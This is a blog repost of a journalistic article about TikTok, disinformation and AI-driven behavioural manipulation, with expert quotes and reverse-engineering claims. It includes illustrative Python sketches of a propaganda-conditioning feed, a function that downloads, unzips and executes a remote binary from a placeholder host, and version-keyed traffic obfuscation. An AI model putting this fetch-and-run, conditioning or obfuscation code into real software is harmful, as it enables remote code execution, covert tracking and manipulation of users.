A Blog by Jonathan Low

 

Sep 8, 2020

Cognitive Hacking, Disinformation - and TikTok

Researchers have long believed social media platforms - Facebook, in particular - were designed to implicitly influence users' behavior.

With TikTok, the intent is explicit and the outcomes are not limited to sales and marketing. JL

Izabella Kaminska reports in FT Alphaville:

Just 1% of a population (can) destabilise a democracy with a collapse in institutional trust. How hard is it to radicalise 1% with weaponised forms of persuasion? Easy. The biggest risk to cognitive security is now AI-driven influence hiding behind algorithms on social media platforms. Enter TikTok. This program develops predictive behavioral models expunged from data exposed by users’ digital footprints. Engineered to generate dopamine and cortisol, (it) has the capacity to create a user-specific profile of individuals’ fears and anxieties, learning which stimuli are trigger desired behaviors. The ultimate goal is “ideological remodelling” and “thought reform”.
Persuasion doesn’t need to influence the majority of the public to be effective. It’s enough to convince just one per cent of a population to destabilise a democracy pretty effectively with protests, rioting and a collapse in institutional trust. So the question that really needs asking is: how hard is it to radicalise one per cent of the public with modern, weaponised forms of persuasion?
The answer, experts say, is dangerously easy.
Those who specialise in the field of the persuasive arts told FT Alphaville that in 2020 new cognitive hacking technology gives digitally-crafted propaganda power like never before, and that the biggest risk to cognitive security is now AI-driven influence hiding behind “secret” algorithms on social media platforms.
For a moment, remove from the equation whether the social movements erupting across western democracies in 2020 are justified or not. The intention of this post is not to analyse the tenets of these movements, but rather to consider if it’s possible, whether by propaganda, social conditioning or amplified feedback loops, to radicalise well-intentioned people to turn against their own interests. In other words, can a good cause be intentionally weaponised against a population without their knowledge?
What we know is that the gain for a foreign adversary from purposefully radicalising elements of any social movement is potentially incalculable. The risk on their end, meanwhile, is trivial, not least because every facet of the technology already exists.

Enter TikTok

TikTok, owned by the private Chinese company ByteDance, is an app with 800 million users that is popular with adolescents and young kids. Until the recent controversies about its ownership, its leadership was said to be vulnerable, like that of many other Chinese platforms, to direct influence by the Chinese Communist party. 
This comes about because Chinese parent companies are obliged to follow CCP directives even if their foreign entities are separated, as these directives apply globally. China’s 2017 national intelligence law directs that “any organisation and citizen” shall support and co-operate “in national intelligence work”. Thus, if the Chinese government decided to boost the signal of any particular message on TikTok, the concern is it would be easy for it to do so by exploiting security vulnerabilities, as the White House recently highlighted in an executive order.
FT Alphaville spoke to Paul Dabrowa, an artificial intelligence and social media expert specialising in the operational underpinnings of persuasion and related psychology. Dabrowa is presently the co-founder of biome.ai, a company which uses artificial intelligence to develop treatments for disease using the human microbiome. However, his academic background, at both Melbourne University and the Harvard Kennedy School, saw him interviewing former Nazis and KGB operatives to develop a neuroscience model of how totalitarian propaganda works, and he has advised on these issues ever since. 
Dabrowa says one way the CCP could destabilise a foreign presidential campaign using TikTok, for example, would be to boost the signal of an otherwise small user to pull a political “prank” or to spread a specific piece of fake news.
This sort of stuff has happened before on online platforms. As Dabrowa noted to us, in 2013 unverified news spread in India about a young Hindu girl who complained to her family that she’d been verbally abused by a Muslim boy. In response, her brother and cousin reportedly went to pay the boy a visit and killed him. A gruesome video then circulated on social media of two men being beaten to death, accompanied by a caption that identified the victims as Hindu and the mob as Muslim, which spurred real clashes between Hindu and Muslim communities. Some 13,000 Indian troops were called upon to put down the resulting violence.
Post-facto analysis, however, showed the video had been spread by social media “bot” accounts controlled by a political actor and that the video itself was of an entirely different incident. Not only was the video not of the men claimed in the caption, but the incident didn’t even take place in India. 
Dabrowa says that to gain traction, the operatives behind this attack required no technical skill whatsoever; just a psychosocial understanding of the right place and time to post it to achieve the desired effect.

So what are we really up against this time?

In February 2017, Russian Defense Minister Sergei Shoigu openly acknowledged the formation of an Information Army within the Russian military, noting:
Information operations forces have been established that are expected to be a far more effective tool than all we used before for counterpropaganda purposes.
Dwarfing Russia’s effort in personnel and budget, however, are China’s propaganda operations. Unlike Russia’s efforts, these are highly secret and hidden from organisational diagrams of the Chinese bureaucratic system. 
Those who have studied the system claim its tentacles spread throughout the bureaucratic establishment into virtually every medium concerned with the dissemination of information. The ultimate goal is “ideological remodelling” and “thought reform”. 
The department is headed by the media-shy Wang Huning, said to be an instrumental figure in the rise of General Secretary, and “dictator for life”, Xi Jinping.
As experts from the Rand Corporation noted in testimony to the US-China Economic and Security Review Commission in 2019: “Official propaganda has relentlessly promoted Xi in a manner that many have compared to a ‘cult of personality’. In addition, Xi’s anti-graft campaign has allowed him to crush potential rivals.”
The leadership cult is said to operate under the principles of “Xi Jinping Thought”, under which citizens are even encouraged to replace images of Jesus with those of the party leader.
The Office of Foreign Propaganda, more commonly known as the “Information Office of the State Council of the People’s Republic of China”, coordinates with a coalition of front groups, including the “50 Cent Party” and the “United Front”, to conduct information warfare operations globally. 
The scandal surrounding Cambridge Analytica in 2016 focused on its harnessing of social media and personal data to influence elections in the same way PR agencies target advertising. State-based propaganda, however, can reach into every aspect of people’s lives by utilising all the tools available to totalitarian states; from military grade artificial intelligence to millions of full-time employees posting government messaging on social media.

Why TikTok is not like other platforms

Dabrowa claims TikTok is a fundamentally different app from other social media in the way it uses artificial intelligence to hook its users.
It has not just the capacity to harvest our data, but also, at its disposal, the artificial intelligence techniques the Chinese military has been developing to manipulate and shape the behaviour of its own citizens.
Here’s what Dabrowa noted to us in correspondence:
This is a programme that develops predictive behavioural models derived from the data exposed by users’ digital footprints online. This includes their computers, their smartphones, wearables, and just about any other data-tracking devices. Online communities that have attempted to reverse engineer some of TikTok’s processes have also highlighted the risks. Unlike Facebook, which analyses your current friendship network, TikTok uses a behavioural profile powered by artificial intelligence to populate a user’s feed before friends are even added. It also predicts the type of friends you should have for your personality. 
Once outfitted with this information, the TikTok AI has the capacity to train users using methods similar to those dog trainers use, ie deploying positive and negative feedback loops to encourage TikTok users to behave in certain ways. In practice the user would see a feed of people they are not necessarily linked to. Initially the videos would appear funny and generate positive emotions, at which point the user would be directed to a propaganda video generated by the CCP, with the hope they would then share it. With repeated exposure the positive emotions would become subconsciously linked to the propaganda message, in the same way a dog can be made to sit with food training. Over time children could be trained to associate positive emotions with political positions favourable to the CCP, or to react negatively to positions critical of it. 
The technology further has the capacity to create a user-specific profile of individuals’ fears and anxieties, learning which stimuli are likely to trigger desired responses and behaviours. It could then utilise addictive principles and implement stimuli that compel young adults to spend hours scrolling on their phone, purchase products, or join political movements. These algorithms are bespoke to the user and are powerful due to a century’s worth of research into shaping human behaviour.
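Neither Dabrowa nor anyone outside ByteDance has published the algorithm itself, but the conditioning loop he describes is simple enough to express in code. Here is a minimal, purely hypothetical Python sketch of a feed scheduler that pairs a run of high-reward clips with a “target” video, so that accumulated positive affect transfers to it. The item names, engagement signal and streak threshold are our own illustrative assumptions, not anything taken from TikTok:

```python
import random

class ConditioningFeed:
    """Toy illustration of the operant-conditioning loop described above.
    Everything here is hypothetical: the item pools, the engagement
    signal and the streak threshold are invented for illustration."""

    def __init__(self, reward_items, target_items, streak_needed=3):
        self.reward_items = reward_items    # content the profile predicts this user enjoys
        self.target_items = target_items    # content the operator wants associated with that enjoyment
        self.streak_needed = streak_needed  # consecutive positive reactions before pairing
        self.streak = 0

    def next_item(self):
        # After a run of positive reactions, slip in a target item so the
        # accumulated positive affect is paired with it (the "dog training" step).
        if self.streak >= self.streak_needed and self.target_items:
            self.streak = 0
            return self.target_items.pop(0)
        return random.choice(self.reward_items)

    def record_reaction(self, watched_fully, liked, shared):
        # A crude engagement signal standing in for the behavioural profile.
        positive = watched_fully or liked or shared
        self.streak = self.streak + 1 if positive else 0


feed = ConditioningFeed(
    reward_items=["funny_cat_42", "dance_17", "prank_9"],
    target_items=["message_video_1"],
)
for _ in range(8):
    item = feed.next_item()
    # Simulate a user who engages with most of what they are shown.
    feed.record_reaction(watched_fully=random.random() < 0.8, liked=False, shared=False)
    print(item)
```

The mechanism itself is trivial; on Dabrowa’s account, the power comes from the behavioural profile deciding, per user, what counts as a “reward”.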
We asked Dr. Robert Lustig, author of The Hacking of the American Mind and a paediatric endocrinologist who has looked closely at how neuromarketing can influence addictive behaviours online, how plausible it was that users were being groomed on apps like TikTok through addictive processes. His answer?
Absolutely. These apps are engineered to generate dopamine AND cortisol. If it were just dopamine, they would not be addictive. But they do both, in part due to peer pressure, which is particularly problematic in the teen age group.
I can't specifically tell you how TikTok does it (I have not investigated personally), but my understanding is that kids are supposed to generate their own content — but that it gets “liked”, just like Facebook. And that's where the addiction comes. 
And we've learned that anything that generates both dopamine and cortisol will turn the prefrontal cortex offline. In fact, a colleague in Paris and I are building a “robotic limbic system” to test this exact paradigm. So far it works! Which is not good news for kids.

Reverse engineering TikTok

While the algorithms TikTok uses are proprietary, much of the above has been gleaned from independent analysis of how the app functions on your phone. 
One anonymous redditor, for example, claimed in April to have reverse engineered some of the app’s processes, finding that: 
TikTok is a data collection service that is thinly-veiled as a social network. If there is an API to get information on you, your contacts, or your device . . . well, they're using it.
But also that:
They have several different protections in place to prevent you from reversing or debugging the app as well. App behaviour changes slightly if they know you're trying to figure out what they're doing. There's also a few snippets of code on the Android version that allows for the downloading of a remote zip file, unzipping it, and executing said binary. There is zero reason a mobile app would need this functionality legitimately.
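For those who don’t reverse engineer apps for fun, the download-unzip-execute pattern flagged above is worth dwelling on, because it is trivial to implement and would let an operator ship and run arbitrary new code outside any app store review. A hypothetical Python equivalent of the pattern (the URL, file names and entry point are all invented; this is the generic technique, not TikTok’s code) looks like this:

```python
# Hypothetical illustration of "download a remote zip, unzip it,
# and execute said binary". Nothing here is taken from a real app.
import subprocess
import tempfile
import urllib.request
import zipfile
from pathlib import Path

def fetch_and_run(url: str) -> None:
    workdir = Path(tempfile.mkdtemp())
    archive = workdir / "payload.zip"
    urllib.request.urlretrieve(url, archive)   # download the remote zip
    with zipfile.ZipFile(archive) as zf:
        zf.extractall(workdir)                 # unzip it
    binary = workdir / "payload"               # assumed entry point inside the archive
    binary.chmod(0o755)                        # mark it executable
    subprocess.run([str(binary)], check=True)  # ...and execute said binary

# fetch_and_run("https://updates.example.com/payload.zip")  # hypothetical URL
```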
The analysis also showed that much of the app’s data collection and analytics traffic is disguised by encrypting requests with an algorithm that changes with every update, implying TikTok is going to some effort to hide its tracks. The analysis also notes the app cannot be used if communications with its analytics host are blocked off.
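The “algorithm that changes with every update” claim is likewise mundane to engineer. Here is a toy sketch assuming, as the analyses suggest, that the obfuscation is keyed to the client build so that each release breaks yesterday’s decoders; the salt, key derivation and XOR stream are illustrative only:

```python
# Toy sketch of version-keyed request obfuscation. The salt, key
# derivation and XOR stream are invented, not TikTok's actual scheme.
import hashlib
import itertools
import json

APP_VERSION = "16.3.1"  # hypothetical build string baked into the client

def version_key(version: str) -> bytes:
    # Rotating the key material per release means an old decoder
    # no longer parses the new traffic.
    return hashlib.sha256(f"analytics-salt:{version}".encode()).digest()

def obfuscate(payload: dict, version: str = APP_VERSION) -> bytes:
    raw = json.dumps(payload).encode()
    key = itertools.cycle(version_key(version))
    return bytes(b ^ k for b, k in zip(raw, key))  # simple XOR stream

blob = obfuscate({"device_id": "abc123", "event": "video_view"})
print(blob.hex())
```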
US-based Penetrum Research offered a similar analysis. It further noted the app monitors and collects location data (for location-based advertisements), before concluding:
After extensive research, we have found that not only is TikTok a massive security flaw waiting to happen, but the ties that they have to Chinese parties and Chinese ISPs make it a very vulnerable source of data that still has more to be investigated.
A Wall Street Journal investigation last week corroborated many of the allegations, including that the TikTok app collects handset-specific data and that ByteDance takes measures to conceal the data it captures. “TikTok wraps most of the user data it transmits in an extra layer of custom encryption,” it noted.
Ross Anderson, a professor of security engineering at the University of Cambridge, told FT Alphaville that “lots of firms indulge in abuses that break the app stores’ rules, and many of the offenders are Chinese.” But he also reminded us that all big platforms are predatory.
A TikTok spokesman rejected the claims, telling Alphaville: “There's a lot of misinformation about TikTok out there. While we welcome scrutiny, we expect to be judged on the facts and the suggestion that TikTok would amplify sympathetic content about the CCP on behalf of the Chinese government is ludicrous.”
The spokesman added that the company’s own security review had found many allegations were inaccurate or reflected analysis of older versions of the app, and pointed to alternative independent analysis. He also noted that TikTok user data is stored in the US and Singapore, and that the app is not even available in China.
Nonetheless, it has been widely reported that TikTok has a remarkably similar behavioural profiling AI to its sister app Douyin, which is also owned by ByteDance but can only be downloaded in China. Like TikTok, Douyin has the capacity to create a profile to influence behaviour through well-timed triggers. 
As Dabrowa explained to us, Douyin is compelled by Chinese law to share any information the Chinese government requests. The technology in this way has the capacity to serve the Communist regime by helping feed data to China's Social Credit System, which seeks to assign citizens scores in order to engineer social behaviour. Such data has already been used to ban more than 7m people deemed “untrustworthy” from boarding flights and nearly 3m from riding on high-speed trains.
It’s also worth noting that in 2018 ByteDance’s founder Zhang Yiming pledged in a public apology to use his companies to “promote socialist core values”, adhere to the Chinese Communist party’s ideology, political thinking and deeds, “deepen co-operation” with state propaganda and “integrate the right values into technology and products”.
From Dabrowa:
Chinese authorities recently announced they would seek to freeze the assets of those deemed “dishonest people”. These intimate profiles are also used by the totalitarian regime to curate social media feeds to distract from undesirable political ideas such as “free speech” or the protests in Hong Kong. In some cases, the data the CCP collects is used to isolate and flag enemies of the people for arrest and shipment to concentration camps. 
Former Google CEO Eric Schmidt recently warned about Chinese AI, stating: “Trust me, these Chinese people are good. They are going to use this technology for both commercial as well as military objectives with all sorts of implications.” And they are. Hence the panic. This AI is most likely already being used by the Chinese government to attempt to exert social and political control, preemptively shaping how people behave on a scale never seen before in human history.
Similar concerns have been echoed by Reddit CEO Steve Huffman, who in February 2020 described the app as “fundamentally parasitic” and said he could not bring himself “to install an app like that on my phone”.
While ByteDance says it is trying to separate the Chinese version of the app from TikTok, Dabrowa says the risk remains that many backdoors may go undetected regardless. Given that TikTok’s target audience is children and young adults, Dabrowa concludes that Microsoft purchasing TikTok and storing all user data in the United States may not be enough to keep users safe:
Data breaches are not the real concern and never have been. The real threat is the true agenda of the artificial intelligence that uses TikTok data for manipulation purposes.
